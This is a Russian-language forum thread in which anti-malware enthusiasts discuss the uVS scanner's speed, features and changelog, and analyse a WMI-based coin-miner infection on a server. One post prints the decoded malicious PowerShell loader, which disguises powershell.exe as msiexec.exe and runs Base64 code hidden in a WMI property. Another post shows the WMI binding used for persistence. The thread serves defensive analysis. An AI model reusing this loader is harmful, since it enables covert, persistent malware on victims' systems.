Перейти к содержанию

Recommended Posts

Dragokas
1 час назад, demkd сказал:

это не поможет, все упирается в убитый диск или сильно фрагментированный диск и на наличие активного антивируса, последний как раз может удвоить, а то и утроить время создания диска, процесс то очень простой: считывание файла, подсчет контрольной суммы, потом проверка эцп тут хоть рилтайм ставь станет разве что хуже, процессор тут не самое узкое место.

По CPU понятно. А если поднять I/O priority: https://stackoverflow.com/a/3057675/10205274

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dragokas
1 час назад, PR55.RP55 сказал:

По поводу доступа к данным и скорости я уже писал:

https://www.jam-software.com/ultrasearch/

Сбор данных занимает секунды.

У меня чекер ярлыков работает на таком движке. Если нужно, поделюсь исходником, но я так понял не нужен.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
3 часа назад, Dragokas сказал:

А если поднять I/O priority

поднять то можно, вот только это вряд ли поможет, разве что в системе кто-то очень серьезно напрягает винт причем и на запись и на чтение одновременно, я таки думаю что 50% это проблема с антивирусом, 40% недостаток физической памяти и постоянный своп из-за 100500 открытых вкладок в хроме, которые никто не хочет закрывать и 10% на битые винты, а может и больше, настолько это стало распространено, мне даже пришлось утилиту писать для лечения ntfs разделов, увы но никакие стандартные или нестандартные утилиты даже беды в половине случаев прописать не могут, тот же chkdsk игнорирует любые ошибки кроме собствено bad crc и беды не ставит, в результате начинаются дикие тормоза вплоть до неработоспособности ситсемы, не говоря уже про кластера висящие под полсекунды на чтении... и так вот со всем софтом что пальцем не ткни элементарно не работает.
 

3 часа назад, Dragokas сказал:

У меня чекер ярлыков работает на таком движке. Если нужно, поделюсь исходником, но я так понял не нужен.

У меня свой движок, ярлыки разбираются без применения api на низком уровне, заметно быстрее сделать вряд ли возможно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

А если использовать ресурсы видеокарты ?

Так можно будет игнорировать:

100500 открытых вкладок в хроме;  нехватку оперативной памяти >  за счёт работы с памятью самой видеокарты.

+ временно  ограничить доступ к ресурсам видеокарты.

CUDA +

Порой объём памяти современной видеокарты больше чем " родной " оперативной.

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 минуты назад, PR55.RP55 сказал:

+ временно  ограничить доступ к ресурсам видеокарты.

память видеокарты никак не поможет просто потому что нет физической, тем более что uVS кушает меньше 100mb даже в 64-х битных системах, а хлам обычно на 32-х битных где считай почти вдвое меньше требуется памяти.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

" ультра бюджетный одноядерный AMD Sempron 145, правда с щедрыми 4gb памяти, но uVS не настолько прожорлив
и даже его uVS не смог постоянно грузить на 100% "

Это когда система чиста. Без майнеров\вирусов\антивирусов?

А если эту нагрузку отдать на GPU  ?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
50 минут назад, PR55.RP55 сказал:

Это когда система чиста. Без майнеров\вирусов\антивирусов?

да, но и семпаронов уже давно таких нет, только двухядерные.
 

50 минут назад, PR55.RP55 сказал:

А если эту нагрузку отдать на GPU  ? 

GPU это графический процессор, он пригоден разве что для подсчета хешей, отдельный шейдерный процессор значительно слабее CPU поэтому использовать GPU можно лишь для специфических вычислительных задач не требующих подгрузки данных с диска, иначе оно тотально проигрывает в производительности даже ультра бюджетным CPU, лучше таки почитать про возможности GPU и не предлагать чушь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dragokas

А если эту нагрузку отдать на GPU  ?

Так-то Дмитрию придётся переписывать половину программы и заодно несколько библиотек Майкрософт :D

Ну или поставлять свою программу в комплекте с упакованным процессором. =))

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

посмотри, пожалуйста,

исходное сообщение:

Цитата

Словил майнер на Сервере и не могу избавится: Оперативная память = msiexec.exe(16684);модифицированный Win32/CoinMiner.DV

какой-то хитрый запуск майнера через WMI, но в списке объектов все файлы легальные, имхо, через powershell выполняется закодированный возможно Base64 скрипт. (и  возможно, новый класс используется для запуска майнера: CommandLineEventConsumer, FsxxleConsumer)

 

https://forum.esetnod32.ru/forum6/topic14912/

образ автозапуска во вложении.

-----------------

попробовал декодировать из Base64, получается:

if ((get-process -name msiexec -ErrorAction SilentlyContinue).Path -eq (dir env:SystemRoot).Value+'\Panther\msiexec.exe'){exit}else{Stop-Process -name msiexec -Force -ErrorAction SilentlyContinue;Stop-Process -name xmrig -Force -ErrorAction SilentlyContinue;cd $env:windir\Panther;copy $env:windir\system32\WindowsPowerShell\v1.0\powershell.exe msiexec.exe -ea SilentlyContinue;copy $env:windir\SysWOW64\WindowsPowerShell\v1.0\powershell.exe msiexec.exe -ea SilentlyContinue;start-process .\msiexec.exe {$WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))} -WindowStyle hidden};exit

 

TS-SERV_2018-08-23_12-05-46.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
31 минут назад, santy сказал:

посмотри, пожалуйста,

C:\WINDOWS\PANTHER\MSIEXEC.EXE
на самом деле это PowerShell
CmdLine: "C:\Windows\Panther\msiexec.exe" $WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))
да что-то делает в wmi, но есть проблема кто запустил его не ясно, радует лишь то что запушен был только он бывает случаи когда пускается по три четыре процесса с разным назначением, нужен таки логгер pid-ов запускаемых процессов
остальное толлько вечером смогу просмотреть, сейчас надо уезжать.
Можно попробовать определить кто таки его запускал используя
https://www.nirsoft.net/utils/executed_programs_list.html

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
3 минуты назад, demkd сказал:

C:\WINDOWS\PANTHER\MSIEXEC.EXE
на самом деле это PowerShell

да, этот msiexec (powershell который) запускается походу из раскодированного скрипта:

........

start-process .\msiexec.exe {$WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))

......

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

А нет оно есть в WMI разделе, ничего нового в целом, разве что текст скрипта в base64.
Есть упущение в обработке CommandLineEventConsumer
игнорируется поле WorkingDirectory, но в данном случае это не важно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
13 минут назад, PR55.RP55 сказал:

Статья:

это не то, здесь используется powershell и лечить элементарно убить эвент, убить процесс собственно все.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

Появился первый практический UEFI rootkit

https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

В качестве решения предлагается замена прошивки.

Однако:

1) Нужно выявить, что заражён именно UEFI - значит  как-то нужно это проверить.

Есть программа: Universal BIOS Backup ToolKit 

Которая может ( ? ) создать резервную копию BIOS

Соответственно получив файл мы можем его проверить на V.T. или передать на анализ в вир.лаб.

Или изучить самостоятельно.

2) Нужна профилактика: uVS может создавать резервную копию реестра; системных файлов\STORE

Можно получить оригинальную копию BIOS  и в  последующим при необходимости сравнить\восстановить.

3) Создавать базу SHA1 проверенных прошивок.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

И кстати почему бы не добавить возможность получать\добавлять в базу проверенных SHA1 файлы:

hosts

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
В 30.09.2018 at 4:03 AM, PR55.RP55 сказал:

Появился первый практический UEFI rootkit

в данный момент работа с прошивками не планируется, слишком большой объем работ с практически нулевым выхлопом, использование же внешним программ для считывания информации это сельский стиль, который всегда заканчивается эпикфейлом.

 

В 30.09.2018 at 4:10 AM, PR55.RP55 сказал:

hosts

потому что с hosts uVS работает как с базой, возможно когда-нибудь появится возможность делать отдельные записи проверенным.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Небольшое обновление для закрытия проблемы c wmi/задачами на базе известных файлов.

---------------------------------------------------------
 4.0.21
---------------------------------------------------------
 o Добавлена поддержка параметра WorkingDirectory для класса CommandLineEventConsumer.

 o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
   Скриптовые команды: delwmi и deltsk

 o Исправлена ошибка чтения кэша задач, в некоторых случаях кэш мог не проверяться.

 o Процесс со средней загрузкой >50% на 1 ядро автоматически получает статус "подозрительный".

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

1) По UEFI  можно провести некие подготовительные работы ?

т.е. выполнить часть из того, о чём я писал.

Чтобы в случае реальных проблем можно было бы в сжатые сроки отреагировать.

2) hosts и возможность делать отдельные записи проверенным...

Я бы всё таки реализовал возможность добавлять SHA1 файла в базу проверенных.

И пусть uVS и дальше работает с файлом, как с базой.

При этом, если файл hosts  есть в базе проверенных при [v] "Скрыть: проверенные " записи\строчки относящиеся к данному файлу будут  скрываться _все разом.

3) WMI и прочее "лишнее"  Возможно стоит добавить возможность отключать работу WMI

Как говориться нет WMI нет проблемы ?

4) o Процесс со средней загрузкой >50% на 1 ядро автоматически получает статус "подозрительный".

Э...

Так там все браузеры будут в списке подозрительных с их 1000500 страницами, расширениями и т.д.

что, если автоматически проверять не все ЭЦП а  только ЭЦП файлов которые uVS внёс в список подозрительных ?

Однако для нормальной работы будет нужен базовый\ограниченный\встроенный wdsl - чтобы всё было культурно, включающий только ЭЦП  легальных браузеров.= > Минимум времени на проверку и сокращение списка подозрительны.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
13 часов назад, PR55.RP55 сказал:

1) По UEFI  можно провести некие подготовительные работы ?

у меня нет лишнего времени, вероятность раскопать что-то гарантировано позволяющее считывать реальную прошивку, а не чистый образ скармливаемый руткитом, практически равна нулю, а скорее даже именно равна нулю, единственный способ это грузиться без всякого uefi с R/O носителя, вот только это бесполезно на практике, а если есть косвенные признаки модификации прошивки вот тогда и можно грузиться с диска, перешивать bios, презаписывать загрузчики убивая буткиты и трясти систему на предмет хвостов.
 

13 часов назад, PR55.RP55 сказал:

При этом, если файл hosts  есть в базе проверенных при [v] "Скрыть: проверенные " записи\строчки относящиеся к данному файлу будут  скрываться _все разом.

не нужно усложнять это глупо.

13 часов назад, PR55.RP55 сказал:

Как говориться нет WMI нет проблемы ?

Тогда уже лучше сформатировать винт, нет системы нет проблемы.

13 часов назад, PR55.RP55 сказал:

Так там все браузеры будут в списке подозрительных с их 1000500 страницами, расширениями и т.д.

и что много уже попало? xD

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 28.09.2018 at 10:17 PM, demkd сказал:

А нет оно есть в WMI разделе, ничего нового в целом, разве что текст скрипта в base64.
Есть упущение в обработке CommandLineEventConsumer
игнорируется поле WorkingDirectory, но в данном случае это не важно.

почему-то объект с Consumer_Name=FsxxleConsumer не попал в список объектов автозапуска, как в предыдущем случае это было с fuckyoumm2_consumer, (не успел отправить сообщение 28.09 )

теперь вижу, что результат есть в 4.0.21
 

Цитата

  Скриптовые команды: delwmi и deltsk

demkd,

эти команды будут автоматически добавляться в скрипт из контекстного меню? не нашел как это сделать. обычно просто есть опция  - удалить файл, и команда формируется как del   filename

+

пример первого детекта активности майнера по GPU

C:\MO\CLAYMORE\ETHDCRMINER64.EXE

АКТИВНЫЙ ?ВИРУС? ВИРУС ПОДОЗРИТЕЛЬНЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ] GPU

Win64/CoinMiner.BX (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-03

GPU 2: 99,31%

https://virusinfo.info/showthread.php?t=220384

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
3 часа назад, santy сказал:

теперь вижу, что результат есть в 4.0.21

он и в том образе был, просто галку скрывать проверенные надо было скинуть, другое дело что удаление его привело бы к убиению lnk файлов, а это не очень хорошо.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"FsxxleConsumer\"";
    Filter = "__EventFilter.Name=\"FsxxleFilter\"";
};

3 часа назад, santy сказал:

эти команды будут автоматически добавляться в скрипт из контекстного меню?

да, эти пункты контекстного меню доступны в категориях задач и WMI, но пожалуй да, нужно сделать доступными везде, а то неудобно использовать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
6 минут назад, demkd сказал:

он и в том образе был, просто галку скрывать проверенные надо было скинуть, другое дело что удаление его привело бы к убиению lnk файлов, а это не очень хорошо.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"FsxxleConsumer\"";
    Filter = "__EventFilter.Name=\"FsxxleFilter\"";
};

Я имел  ввиду, что объект был в списке в качестве отдельного элемента

полное имя: WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]

Consumer_Name:fuckyoumm2_consumer

а с Consumer_Name: FsxxleConsumer такое не получилось.

только в контексте объекта с полным именем

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

т.е. так оно понятнее:

delwmi WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]

чем

delwmi %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
50 минут назад, santy сказал:

Я имел  ввиду, что объект был в списке в качестве отдельного элемента

если есть возможность идентифицировать файл то он проявляется именно как файл, а если это обезличенный скрипт вот тогда у него будет специфическое имя, так удобней удалять если скажем это .vbs который может засветиться не только в wmi, а в случае известных файлов теперь есть delwmi который удаляет лишь то что нужно, причем если будет несколько wmi событий на базе того же powershell все они будут удалены.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×